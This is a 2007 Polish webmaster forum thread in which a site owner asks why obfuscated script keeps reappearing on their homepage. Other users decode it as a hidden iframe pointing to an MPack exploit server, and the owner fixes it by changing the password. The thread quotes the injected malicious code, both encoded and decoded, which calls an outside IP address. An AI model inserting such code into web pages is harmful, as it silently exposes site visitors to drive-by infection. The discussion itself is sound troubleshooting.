Podstrony
- telcocafe
- [JavaScript] Problem z Lytebox mały problem z przyciskiem "Next"
- [JavaScript] brak polskich znaków skrypt nie wyświetla wszystkich polskich znaków
- [JS] Wyświetlanie obrazków w danym dniu jak za pomocą javaScript wyświetlać obrazki
- [javascript] Odświeżanie ramki z innej ramki
- [javascript]Lightbox Problem z wyświetlaniem obrazów w lightboxie
- [javascript] Ustawienia drukowania Czy da się drukować w poziomie?
- [xml/js]Parsowanie xml w javascript
- [Javascript] Dodawanie strony do 'ulubionych'
- ciasteczka JavaScript jak je odebrać JavaScript nie widzi mojego ciasteczka:/
- [PHP, JavaScript] Funkcja JS wywoływana z PHP
- zanotowane.pl
- doc.pisz.pl
- pdf.pisz.pl
- szkicowana.keep.pl
telcocafe
Witam! Czy jest możliwe aby do mojej strony stworzonej w HTML wklejał się kod?Otóż, po jakimś czasie od umieszczenia strony na serwerze forall.pl na strone główną samoczynnie wkleja się kod:
<script type="text/javascript" language="Javascript"> eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63% 3D%5C%22%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%35%30%2E%38%32%2F%6D%70%61%63%6B%2F%69%6E%64%65%78% 2E%70%68%70%5C%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%5C%22%64%69% 73%70%6C%61%79%3A%6E%6F%6E%65%5C%22%3E%3C%2F%69%66%72%61%6D%65%3E%22%29%3B%0D%0A%77%69%6E%64%6F%77%2E% 73%74%61%74%75%73%3D%22%20%22%3B"));</script>
Po podmianie 'zainfekowanego' pliku na poprawny, po jakimś czasie kod znowu pojawia się... Nie jestem w stanie stwierdzić dokładnego czasu po jakim ów kod się pojawia ale jest to ok 24h.
Użytkownik HTMLame edytował ten post 02 wrzesień 2007, 19:28
Idę o zakład, ze to po prostu doklejane reklamy do serwisu :)
Idę o zakład, ze to po prostu doklejane reklamy do serwisu :)
Dokładnie. Sprawdź na innym serwerze czy też się ten kod dokleja ;]
I ewentualnie sprawdź regulamin Twojego serwera czy dodaje reklamy do strony etc.
Użytkownik sauron edytował ten post 02 wrzesień 2007, 19:42
Może to ma się dodać? Spytaj administratora.
[PHP] A jak nie chcesz tego to w indeksie przekierowanie zrób na inny plik (header('Location: gg.php');) i tyle.
[PHP] Ostatecznie wgraj na serwer na analogiczne dwa pliki, główny i kopię.. W głównym sprawdzaj rozmiar samego siebie, jak różny od kopii to skopiuj kopię do głównego.
Po zdekodowaniu to nie wygląda na potrzebne....
document.write("<iframe src=\"http://81.95.150.82/mpack/index.php\" width=0 height=0 style=\"display:none\"></iframe>"); window.status=" ";
Tak czy inaczej... Skontaktuj się z administratorem...
Użytkownik NIC edytował ten post 02 wrzesień 2007, 19:45
Dzięki za pomoc. Zmieniłem hasło, pomogło... Podobno był to atak Mpack. W googlach po wpisaniu tego adresu IP znalałzem też coś takiego: http://forum.php.pl/...php/t72881.html
Może komu się przyda ;) Pozdrawiam